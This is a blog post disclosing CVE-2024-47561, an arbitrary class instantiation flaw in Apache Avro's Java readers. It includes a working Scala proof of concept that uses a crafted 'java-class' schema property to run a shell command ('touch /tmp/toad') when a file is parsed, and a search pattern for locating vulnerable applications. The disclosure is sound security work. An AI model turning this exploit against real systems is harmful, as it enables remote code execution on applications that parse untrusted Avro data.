Thursday, October 10, 2024

CVE-2024-47561: Apache Avro arbitrary class instantiation

Avro schemas support specifying types as arbitrary Java classes, using properties like "java-class", "java-element-class" or "java-key-class". This is somewhat documented in org.apache.avro.reflect (Apache Avro Java 1.11.1 API), but not super clearly.

Since it's not super clear, I looked at the code (https://github.com/search?q=repo%3Aapache%2Favro+CLASS_PROP&type=code) and saw that this seems to be supported not only in the ReflectDatumReader, but also in the SpecificDatumReader and the FastReader.

When it encounters such a type, my understanding is that the reader will just call the constructor of that type that takes a single String argument. There appears to be no check on whether the type implements any specific base class, nor any other safety measure; it just calls it. See getPropAsClass and getStringClass.
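To make the pattern concrete, here is a minimal sketch of what "call the single-String constructor of whatever class the schema names" amounts to. This is not Avro's code: `StringCtorSketch` and `instantiateFromString` are hypothetical names made up for illustration, and the harmless java.io.File stands in for an attacker-chosen class.

```scala
object StringCtorSketch {
  // Hypothetical helper (not part of Avro): look up a class by name and
  // call its public constructor that takes a single String argument.
  // Nothing here checks what the class is or what its constructor does.
  def instantiateFromString(className: String, value: String): Any = {
    val cls = Class.forName(className)
    val ctor = cls.getConstructor(classOf[String])
    ctor.newInstance(value)
  }

  def main(args: Array[String]): Unit = {
    // In the vulnerable scenario, both the class name and the argument
    // would come from untrusted input (the schema and the record data).
    val obj = instantiateFromString("java.io.File", "/tmp/toad")
    println(obj.getClass.getName + " -> " + obj)
  }
}
```

With java.io.File the constructor has no side effects, so nothing interesting happens. The problem only shows up once the named class does real work in its String constructor.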

This is pretty bad from a security perspective as it's an arbitrary class instantiation issue. Now the question becomes: can I find a class that when constructed with a String parameter will do something bad, like execute an arbitrary shell command? It turns out to be pretty easy to find in an environment where Scala is used, as the class scala.tools.nsc.interpreter.ProcessResult will do just that.

The following piece of code demonstrates the issue, by creating an Avro file that will trigger the vulnerability when parsed with a SpecificDatumReader:
{
  import java.io.File
  import org.apache.avro.Schema
  import org.apache.avro.generic.{GenericData, GenericDatumWriter, GenericRecord}
  import org.apache.avro.specific.SpecificDatumReader
  import org.apache.avro.file.{DataFileWriter, DataFileReader}
  import scala.util.Try

  // Create an Avro file with the crafted Schema & Record
  val avroSchema = new Schema.Parser().parse("""
{
  "type": "record",
  "name": "topLevelRecord",
  "fields": [
    {
      "type": {
        "type": "string",
        "avro.java.string": "String",
        "java-class": "scala.tools.nsc.interpreter.ProcessResult"
      },
      "name": "value"
    }
  ]
}
""")
  val datumWriter = new GenericDatumWriter[GenericRecord](avroSchema)
  val dataFileWriter = new DataFileWriter[GenericRecord](datumWriter)
  val avroFile = "/tmp/avro"
  dataFileWriter.create(avroSchema, new File(avroFile))
  var record = new GenericData.Record(avroSchema)
  record.put("value", "touch /tmp/toad")
  dataFileWriter.append(record)
  dataFileWriter.flush
  dataFileWriter.close

  // Trigger the arbitrary class instantiation
  val datumReader = new SpecificDatumReader[GenericData.Record]()
  val dataFileReader = new DataFileReader[GenericData.Record](new File(avroFile), datumReader)
  record = new GenericData.Record(dataFileReader.getSchema)
  while (Try(dataFileReader.hasNext).getOrElse(false)) {
    record = dataFileReader.next(record)
    println(record)
  }
  dataFileReader.close
}
Since this is an "it-depends-how-you-use-the-SDK" type of problem, real-world impact is highly dependent on the application. The application would have to use one of the vulnerable readers and also accept a Schema as input (which, to be fair, is often the case, since the schema is usually embedded in the stream or file). If someone wants to be creative with GitHub search patterns like https://github.com/search?type=code&q=%2Fnew+%28Specific%7CReflect%29DatumReader.*schema%2F+path%3A%2F%5C.%28java%7Cscala%29%24%2F they can probably figure it out.
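Since the trigger lives in the schema itself, one way to get a feel for exposure is to look at incoming schema JSON for these properties before handing it to a reader. The sketch below is a crude text heuristic, not a fix and not an Avro API: `SchemaPropScan` and `findClassProps` are hypothetical names, and the list of property names reflects my understanding of how Avro spells them.

```scala
object SchemaPropScan {
  // Property names that let a schema name a Java class
  // (assumed spellings; verify against the Avro version in use).
  val classProps: Seq[String] =
    Seq("java-class", "java-element-class", "java-key-class")

  // Matches "<prop>" : "<value>" pairs in raw schema JSON text.
  private val pattern =
    ("\"(" + classProps.mkString("|") + ")\"\\s*:\\s*\"([^\"]*)\"").r

  // Returns every (property, class name) pair found in the schema text.
  def findClassProps(schemaJson: String): Seq[(String, String)] =
    pattern.findAllMatchIn(schemaJson)
      .map(m => (m.group(1), m.group(2)))
      .toList

  def main(args: Array[String]): Unit = {
    val schema =
      """{"type": "string", "avro.java.string": "String",
        | "java-class": "scala.tools.nsc.interpreter.ProcessResult"}""".stripMargin
    findClassProps(schema).foreach { case (prop, cls) =>
      println(s"schema requests $prop = $cls")
    }
  }
}
```

A regex over raw JSON will miss escaped or oddly formatted input, so this is only good for a quick audit of schemas you already have, not as a security boundary.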
